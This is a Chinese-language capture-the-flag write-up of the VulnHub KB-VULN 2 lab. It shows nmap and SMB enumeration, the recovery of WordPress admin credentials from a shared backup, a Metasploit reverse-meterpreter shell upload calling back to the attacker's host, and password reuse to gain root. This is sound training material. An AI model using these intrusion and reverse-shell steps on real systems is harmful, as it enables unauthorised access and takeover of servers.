KB Vuln 2
作者:jason_huawen
靶机基本信息
名称:KB-VULN: 2
地址:
https://www.vulnhub.com/entry/kb-vuln-2,562/
识别目标主机IP地址
──(kali㉿kali)-[~/Vulnhub/KB_Vuln2]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.89.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:93:01:25 1 60 PCS Systemtechnik GmbH
192.168.56.222 08:00:27:f1:58:96 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的Netdiscover工具识别目标主机的IP地址为192.168.56.222.
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.222 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-26 01:58 EST
Nmap scan report for localhost (192.168.56.222)
Host is up (0.00019s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5e:99:01:23:fe:c4:84:ef:14:55:87:da:a3:30:6f:50 (RSA)
| 256 cb:8e:e1:b3:3a:6e:64:9e:0f:53:39:7e:18:9d:8b:3f (ECDSA)
|_ 256 ec:3b:d9:53:4a:5a:f7:32:f2:3a:f7:a7:6f:31:87:52 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:F1:58:96 (Oracle VirtualBox virtual NIC)
Service Info: Host: UBUNTU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-11-26T06:58:58
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: kb-server
| NetBIOS computer name: UBUNTU\x00
| Domain name: \x00
| FQDN: kb-server
|_ System time: 2022-11-26T06:58:58+00:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.10 seconds
NMAP扫描结果表明目标主机有5个开放端口:21(FTP)、22(SSH)、80(HTTP)、139(SMB)、445(SMB)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2]
└─$ ftp 192.168.56.222
Connected to 192.168.56.222.
220 (vsFTPd 3.0.3)
Name (192.168.56.222:kali): anonymous
530 Permission denied.
ftp:
目标主机FTP服务不允许匿名访问。
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2]
└─$ smbclient //192.168.56.222/Anonymous
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Sep 17 06:58:56 2020
.. D 0 Wed Sep 16 06:36:09 2020
backup.zip N 16735117 Thu Sep 17 06:58:56 2020
14380040 blocks of size 1024. 8813164 blocks available
smb: \> ls -alh
NT_STATUS_NO_SUCH_FILE listing \-alh
smb: \> get backup.zip
getting file \backup.zip of size 16735117 as backup.zip (103435.9 KiloBytes/sec) (average 103436.0 KiloBytes/sec)
smb: \> quit
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2]
└─$ ls
backup.zip nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2]
└─$ unzip backup.zip
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2]
└─$ ls
backup.zip nmap_full_scan remember_me.txt wordpress
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2]
└─$ cat remember_me.txt
Username:admin
Password:MachineBoy141
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2]
└─$ cd wordpress
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2/wordpress]
└─$ ls -alh
total 228K
drwxr-xr-x 6 kali kali 4.0K Sep 16 2020 .
drwxr-xr-x 3 kali kali 4.0K Nov 26 02:02 ..
-rw-r--r-- 1 kali kali 481 Sep 16 2020 .htaccess
-rwxrwxrwx 1 kali kali 405 Sep 16 2020 index.php
-rwxrwxrwx 1 kali kali 20K Sep 16 2020 license.txt
-rwxrwxrwx 1 kali kali 7.2K Sep 16 2020 readme.html
drwxrwxrwx 2 kali kali 4.0K Sep 16 2020 uploads
-rwxrwxrwx 1 kali kali 7.0K Sep 16 2020 wp-activate.php
drwxrwxrwx 9 kali kali 4.0K Sep 16 2020 wp-admin
-rwxrwxrwx 1 kali kali 351 Sep 16 2020 wp-blog-header.php
-rwxrwxrwx 1 kali kali 2.3K Sep 16 2020 wp-comments-post.php
-rw-rw-rw- 1 kali kali 3.2K Sep 16 2020 wp-config.php
-rwxrwxrwx 1 kali kali 2.9K Sep 16 2020 wp-config-sample.php
drwxrwxrwx 6 kali kali 4.0K Sep 16 2020 wp-content
-rwxrwxrwx 1 kali kali 3.9K Sep 16 2020 wp-cron.php
drwxrwxrwx 24 kali kali 12K Sep 16 2020 wp-includes
-rwxrwxrwx 1 kali kali 2.5K Sep 16 2020 wp-links-opml.php
-rwxrwxrwx 1 kali kali 3.3K Sep 16 2020 wp-load.php
-rwxrwxrwx 1 kali kali 48K Sep 16 2020 wp-login.php
-rwxrwxrwx 1 kali kali 8.4K Sep 16 2020 wp-mail.php
-rwxrwxrwx 1 kali kali 20K Sep 16 2020 wp-settings.php
-rwxrwxrwx 1 kali kali 31K Sep 16 2020 wp-signup.php
-rwxrwxrwx 1 kali kali 4.7K Sep 16 2020 wp-trackback.php
-rwxrwxrwx 1 kali kali 3.2K Sep 16 2020 xmlrpc.php
似乎这是目标站点的备份文件,已经发现了用户名和密码(哈哈,也太容易了!):
Username: admin
Password: MachineBoy141
接下来需要找到运行该wordpress的目录或者入口。
浏览器访问80端口,返回apache的默认页面。
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2/wordpress]
└─$ gobuster dir -u http://192.168.56.222 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.222
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/26 02:06:58 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.222/wordpress/]
/server-status (Status: 403) [Size: 279]
Progress: 218439 / 220561 (99.04%)===============================================================
2022/11/26 02:07:25 Finished
===============================================================
访问wordpress的管理后台,在浏览器输入http://192.168.56.222/wordpress/wp-admin,发现浏览器在尝试连接kb.vuln,因此需要将该主机记录添加到/etc/hosts文件中去。
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2/wordpress]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2/wordpress]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.222 kb.vuln
再次访问http://192.168.56.222/wordpress/wp-admin,即管理后台,用上述smbclient得到的用户名和密码可以成功登录。
接下来要设法将shell.php代码上传至目标主机。
修改404模板,并update file时,报以下错误:
Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.
用metasploit首先shell的上传
msf6 > search wp_admin
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_admin_shell_upload
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
Module options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-M
etasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
USERNAME yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.56.222
RHOSTS => 192.168.56.222
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
TARGETURI => /wordpress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD MachineBoy141
PASSWORD => MachineBoy141
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
Module options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD MachineBoy141 yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.56.222 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-M
etasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
USERNAME admin yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.206 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 192.168.56.206:5555
[*] Authenticating with WordPress using admin:MachineBoy141...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wordpress/wp-content/plugins/JQkJgJRXdS/NVsrEleybA.php...
[*] Sending stage (39927 bytes) to 192.168.56.222
[+] Deleted NVsrEleybA.php
[+] Deleted JQkJgJRXdS.php
[+] Deleted ../JQkJgJRXdS
[*] Meterpreter session 1 opened (192.168.56.206:5555 -> 192.168.56.222:50046) at 2022-11-26 02:50:30 -0500
meterpreter > sessions
Usage: sessions <id>
Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>
meterpreter > shell
Process 3607 created.
Channel 0 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
sh: 0: getcwd() failed: No such file or directory
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
www-data@kb-server:$
成功拿到了shell
www-data@kb-server:/home/kbadmin$ ls -alh
ls -alh
total 44K
drwxr-xr-x 5 kbadmin kbadmin 4.0K Sep 17 2020 .
drwxr-xr-x 3 root root 4.0K Sep 16 2020 ..
-rw------- 1 kbadmin kbadmin 16 Sep 17 2020 .bash_history
-rw-r--r-- 1 kbadmin kbadmin 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 kbadmin kbadmin 3.7K Apr 4 2018 .bashrc
drwx------ 2 kbadmin kbadmin 4.0K Sep 16 2020 .cache
drwx------ 3 kbadmin kbadmin 4.0K Sep 16 2020 .gnupg
drwxrwxr-x 3 kbadmin kbadmin 4.0K Sep 16 2020 .local
-rw-r--r-- 1 kbadmin kbadmin 807 Apr 4 2018 .profile
-rw-r--r-- 1 root root 12 Sep 16 2020 note.txt
-rw-r--r-- 1 root root 33 Sep 16 2020 user.txt
www-data@kb-server:/home/kbadmin$ cat user.txt
cat user.txt
03bf4d20dac5644c75e69e40bad48db0
www-data@kb-server:/home/kbadmin$ cat note.txt
cat note.txt
use DOCKER!
www-data@kb-server:/home/kbadmin$ docker images
docker images
Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get http://%2Fvar%2Frun%2Fdocker.sock/v1.40/images/json: dial unix /var/run/docker.sock: connect: permission denied
www-data@kb-server:/home/kbadmin$
提权
www-data@kb-server:/etc$ su - kbadmin
su - kbadmin
Password: MachineBoy141
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
kbadmin@kb-server:~$ sudo -l
sudo -l
[sudo] password for kbadmin: MachineBoy141
Matching Defaults entries for kbadmin on kb-server:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User kbadmin may run the following commands on kb-server:
(ALL : ALL) ALL
kbadmin@kb-server:~$ sudo -u root /bin/bash
sudo -u root /bin/bash
root@kb-server:~# cd /root
cd /root
root@kb-server:/root# ls -alh
ls -alh
total 36K
drwx------ 4 root root 4.0K Sep 17 2020 .
drwxr-xr-x 25 root root 4.0K Sep 16 2020 ..
-rw------- 1 root root 80 Sep 17 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
-rw-r--r-- 1 root root 33 Sep 16 2020 flag.txt
drwxr-xr-x 3 root root 4.0K Sep 16 2020 .local
-rw------- 1 root root 1.1K Sep 17 2020 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4.0K Sep 16 2020 .ssh
root@kb-server:/root# cat flag.txt
cat flag.txt
dc387b4cf1a4143f562dd1bdb3790ff1
root@kb-server:/root#
在知道用户名是kbadmin以后,然后用hydra破解ssh, 或者ftp,尝试了多种方式都不成功,其实kbadmin的密码跟admin的密码一样.
经验教训
-
有些时候不能依赖工具或者字典去破解,而是尽量利用已有的信息去尝试。
-
作者给出的note.txt似乎是一个迷魂阵,因为无论如何都要获取kbadmin的shell。其实在解题过程中,这个思路是正确的,就是设法获得kbadmin的密码,但是只是没有找到正确的途径而已。
-
在用于wordpress后台管理员用户名和密码后,除了可以尝试上传shell.php代码(比如在Media),或者修改404模板,还有一个途径,就是metasploit工具中有wp_admin_shell_upload模块。